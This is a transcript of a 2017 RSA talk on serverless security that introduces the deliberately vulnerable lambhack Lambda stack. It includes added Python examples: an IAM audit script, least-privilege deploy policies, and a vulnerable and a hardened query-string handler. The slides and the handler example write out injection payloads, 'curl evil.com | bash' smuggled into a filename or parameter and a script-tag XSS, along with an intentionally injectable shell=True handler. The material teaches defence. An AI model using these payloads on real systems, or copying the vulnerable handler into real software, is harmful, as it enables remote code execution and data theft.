Talk from RSA 2017 on serverless security and the four areas of growth for security in the world of serverless. The talk also contains the first release of lambhack, an open source, deliberately vulnerable Lambda-based serverless stack demonstrating arbitrary code execution in Lambda.
Serverless Security: Are you ready for the Future?
1. SESSION ID: ASD-F01
#RSAC
James Wickett
Serverless Security:
Are you ready for the Future?
Head of Research
Signal Sciences
@wickett
2.
James Wickett
Head of Research at Signal Sciences
Author of DevOps Fundamentals at lynda.com
Author of a book on DevOps (email me for a free copy > james@signalsciences.com)
Blogger at theagileadmin.com and labs.signalsciences.com
3.
Conclusion
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder
4.
Conclusion (2)
Four key areas apply to serverless security:
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable Lambda stack, open source: github.com/wickett/lambhack
15.
Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services ('in the cloud') to manage server-side logic and state.
http://martinfowler.com/articles/serverless.html
16.
Serverless can also mean applications where some amount of server-side logic is still written by the application developer but, unlike traditional architectures, is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party.
http://martinfowler.com/articles/serverless.html
17.
History of Serverless
2012 - used to describe BaaS and Continuous Integration services run by third parties
Late 2014 - AWS launched Lambda
July 2015 - AWS launched API Gateway
October 2015 - AWS re:Invent talk ARC308, "The Serverless Company Using AWS Lambda"
2015 to present - frameworks forming
2016 - Serverless Conference
http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda
27.
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
39.
"If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve."
- @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
101.
Provider Security
Disable root access keys
Manage users with profiles
Secure your keys in your deploy system
Secure keys in dev systems
Use provider MFA
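The first and last items on that list can be checked rather than assumed. The script below is an added example written for this page, not code from the talk or from lambhack: it parses the CSV that `aws iam get-credential-report` returns (the API hands it back base64-encoded in its `Content` field) and reports root access keys, root without MFA, console users without MFA, and human users carrying long-lived access keys. The account id, user names and timestamps in the embedded report are constructed; the column layout is the real credential-report format.

```python
"""Audit an AWS IAM credential report for the provider-security items above.

Added example, not from the talk. The sample report is constructed; the
column names are those of the real credential report.
"""
import base64
import csv
import io

ROOT = "<root_account>"  # how the credential report names the root user

# Constructed sample in the real credential-report column layout.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_1_last_used_service,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region,access_key_2_last_used_service,cert_1_active,cert_1_last_rotated,cert_2_active,cert_2_last_rotated
<root_account>,arn:aws:iam::123456789012:root,2016-01-01T00:00:00+00:00,not_supported,2017-02-01T00:00:00+00:00,not_supported,not_supported,false,true,2016-01-01T00:00:00+00:00,2017-02-01T00:00:00+00:00,us-east-1,iam,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
alice,arn:aws:iam::123456789012:user/alice,2016-03-01T00:00:00+00:00,true,2017-02-10T00:00:00+00:00,2016-03-01T00:00:00+00:00,N/A,true,true,2016-03-01T00:00:00+00:00,2017-02-10T00:00:00+00:00,us-east-1,lambda,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
deploy-bot,arn:aws:iam::123456789012:user/deploy-bot,2016-06-01T00:00:00+00:00,false,N/A,N/A,N/A,false,true,2016-06-01T00:00:00+00:00,2017-02-12T00:00:00+00:00,us-east-1,lambda,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
bob,arn:aws:iam::123456789012:user/bob,2016-09-01T00:00:00+00:00,true,no_information,2016-09-01T00:00:00+00:00,N/A,false,false,N/A,N/A,N/A,N/A,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
"""
# What the GetCredentialReport API / CLI actually returns in its Content field.
SAMPLE_REPORT_B64 = base64.b64encode(SAMPLE_REPORT.encode())


def decode_report(content_b64):
    """Turn the base64 Content field of GetCredentialReport into CSV text."""
    return base64.b64decode(content_b64).decode()


def audit_credential_report(report_csv):
    """Return (user, finding) pairs. An empty list means the slide's items hold."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]
        mfa = row["mfa_active"] == "true"
        password = row["password_enabled"] == "true"
        keys = (row["access_key_1_active"] == "true"
                or row["access_key_2_active"] == "true")
        if user == ROOT:
            # Root should have no keys at all and a hardware/virtual MFA device.
            if keys:
                findings.append((user, "root has active access keys: delete them"))
            if not mfa:
                findings.append((user, "root has no MFA device"))
            continue
        if password and not mfa:
            findings.append((user, "console login without MFA"))
        if password and keys:
            # A human with long-lived keys means keys living on a dev laptop;
            # the deploy system should be the only holder of standing keys.
            findings.append((user, "human user holding long-lived access keys"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_credential_report(decode_report(SAMPLE_REPORT_B64)):
        print(f"{user}: {finding}")
```

Against the sample, root is flagged twice (active key, no MFA), alice once for carrying keys alongside a console login, bob once for console access without MFA, and the machine identity deploy-bot is not flagged. In a real account, feed it `aws iam generate-credential-report` followed by `aws iam get-credential-report --query Content --output text`.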
110.
Simple Deploy Pipeline Security
Only dev keys can push to 'dev'
Only the build/deploy system can push to pre-prod
Integration tests must pass in this env
Security validation must take place
Allow push to prod only by the deploy system
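On AWS, "only dev keys can push to dev" and "only the deploy system can push to pre-prod and prod" come down to which identity holds `lambda:UpdateFunctionCode` on which function ARNs. The following is an added example written for this page, not code from the talk: it generates the two least-privilege IAM policy documents and includes a deliberately simplified evaluator (explicit Deny wins, otherwise any matching Allow; no Condition, NotAction or resource-policy handling) so the separation can be checked offline. The account id, region, the `-dev` / `-preprod` / `-prod` suffix convention and the function names are assumptions; the policy JSON shape and the Lambda action names are real.

```python
"""Least-privilege IAM policies for the dev / pre-prod / prod pipeline above.

Added example, not from the talk. Account id, region and the naming
convention are assumptions; the IAM policy shape and actions are real.
"""
import fnmatch
import json

ACCOUNT = "123456789012"  # constructed
REGION = "us-east-1"      # assumption

# Actions a code push needs; nothing else (no DeleteFunction, no AddPermission).
DEPLOY_ACTIONS = [
    "lambda:UpdateFunctionCode",
    "lambda:UpdateFunctionConfiguration",
    "lambda:PublishVersion",
]


def lambda_arn(name):
    """ARN of a function in the assumed account/region."""
    return f"arn:aws:lambda:{REGION}:{ACCOUNT}:function:{name}"


def deploy_policy(env_suffixes):
    """Allow pushes only to functions whose names end in one of env_suffixes."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": DEPLOY_ACTIONS,
            "Resource": [lambda_arn(f"*-{s}") for s in env_suffixes],
        }],
    }


DEV_POLICY = deploy_policy(["dev"])                       # attached to developer users/roles
DEPLOY_SYSTEM_POLICY = deploy_policy(["preprod", "prod"])  # attached only to the build/deploy role


def _as_list(v):
    return v if isinstance(v, list) else [v]


def is_allowed(policy, action, resource_arn):
    """Simplified IAM evaluation: an explicit Deny wins, else any matching Allow.

    IAM wildcards (* and ?) map onto fnmatch; ARNs contain no [ ] so the extra
    fnmatch syntax does not matter. Conditions and NotAction are not modelled.
    """
    allowed = False
    for stmt in policy["Statement"]:
        if not any(fnmatch.fnmatchcase(action, a) for a in _as_list(stmt["Action"])):
            continue
        if not any(fnmatch.fnmatchcase(resource_arn, r) for r in _as_list(stmt["Resource"])):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


def who_can_push(function_name):
    """Map principal -> bool for a code push to the named function."""
    arn = lambda_arn(function_name)
    return {
        "developer": is_allowed(DEV_POLICY, "lambda:UpdateFunctionCode", arn),
        "deploy-system": is_allowed(DEPLOY_SYSTEM_POLICY, "lambda:UpdateFunctionCode", arn),
    }


if __name__ == "__main__":
    print(json.dumps(DEPLOY_SYSTEM_POLICY, indent=2))
    for fn in ("orders-dev", "orders-preprod", "orders-prod"):
        print(fn, who_can_push(fn))
```

Name-suffix scoping is only as strong as the naming rule, so pair it with a check in the deploy system that refuses to create functions outside the convention; separate AWS accounts per environment, with the deploy role assuming into them, is the stronger version of the same idea.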
114.
"Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner."
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
121.
Types of Attacks
XSS, injection, deserialization, ...
New surface area, same problems
e.g. appending 'curl evil.com | bash' or <script>alert(1)</script> to the filename of an object you upload to S3: the filename ends up in a shell command or an HTML page built by a function
123.
New Thing Alert!
Wanted to make the point that appsec is still relevant in serverless
A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, RailsGoat and Gruyere, ...)
Introducing lambhack
125.
lambhack
A vulnerable Lambda + API Gateway stack
Open source, MIT licensed
Released for the first time here at RSA
Includes arbitrary code execution via a query string
More work needed, PRs accepted and looking for community help
github.com/wickett/lambhack
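The "Types of Attacks" slide and lambhack's query-string code execution are the same bug class: attacker-controlled text (a filename, a query parameter) concatenated into a shell command and reflected into HTML by a function that runs with the Lambda role's permissions. The handler pair below is an added example written for this page; it is not lambhack's code and does not claim to mirror lambhack's implementation. The `name` query parameter, the use of `wc -c`, and the handler names are assumptions. The vulnerable handler is shown only to read; the hardened one validates the parameter against an allow-list, passes argv to `subprocess` without a shell, and escapes what it echoes back.

```python
"""Command injection and XSS through an API Gateway query string, the bug
class lambhack demonstrates. Added example, not lambhack's code.
"""
import html
import os
import re
import subprocess
import tempfile


def _query_param(event, key):
    """Read a query-string parameter from an API Gateway proxy event."""
    return (event.get("queryStringParameters") or {}).get(key, "")


def build_command_vulnerable(event):
    """The shell string the vulnerable handler would run: untrusted text
    concatenated straight into a command. `name=x; curl evil.com | bash`
    becomes a second command executed under the function's IAM role."""
    return f"wc -c /tmp/{_query_param(event, 'name')}"


def handler_vulnerable(event, context=None):
    """Do NOT deploy this. shell=True on attacker text, raw reflection into HTML."""
    name = _query_param(event, "name")
    out = subprocess.check_output(build_command_vulnerable(event), shell=True, text=True)
    return {"statusCode": 200, "headers": {"Content-Type": "text/html"},
            "body": f"<p>{name}: {out}</p>"}  # <script>alert(1)</script> in name runs in the browser


# Allow-list: a plain filename, no path separators, no shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def validate_name(name):
    """Return the name if it is a bare filename, else None (reject, don't sanitise)."""
    return name if SAFE_NAME.fullmatch(name) else None


def handler_hardened(event, context=None, base_dir="/tmp"):
    """Same feature, with the injection and reflection points closed."""
    name = validate_name(_query_param(event, "name"))
    if name is None:
        return {"statusCode": 400, "body": "invalid name"}
    path = os.path.join(base_dir, name)
    if not os.path.isfile(path):
        return {"statusCode": 404, "body": "not found"}
    # argv list, no shell: the filename is one argument, never parsed as a command
    result = subprocess.run(["wc", "-c", path], capture_output=True, text=True, check=True)
    size = result.stdout.split()[0]
    # Escape anyway; the allow-list may be loosened later and the output context is HTML
    body = f"<p>{html.escape(name)}: {size} bytes</p>"
    return {"statusCode": 200, "headers": {"Content-Type": "text/html"}, "body": body}


def demo_hardened():
    """Run the hardened handler on a constructed 5-byte file and on an injection attempt."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "report.txt"), "wb") as f:
            f.write(b"hello")
        ok = handler_hardened({"queryStringParameters": {"name": "report.txt"}}, base_dir=d)
        bad = handler_hardened({"queryStringParameters": {"name": "report.txt; curl evil.com | bash"}}, base_dir=d)
    return ok, bad


if __name__ == "__main__":
    attack = {"queryStringParameters": {"name": "x; curl evil.com | bash"}}
    print("vulnerable handler would run:", build_command_vulnerable(attack))
    print(demo_hardened())
```

Rejecting bad input outright is deliberate: stripping metacharacters tends to leave a second encoding or a path trick behind, while an allow-list plus argv execution removes the shell from the picture. Because the function's IAM role is what the injected `curl | bash` would run as, the pipeline policies and the least-privilege execution role matter as much as the input handling.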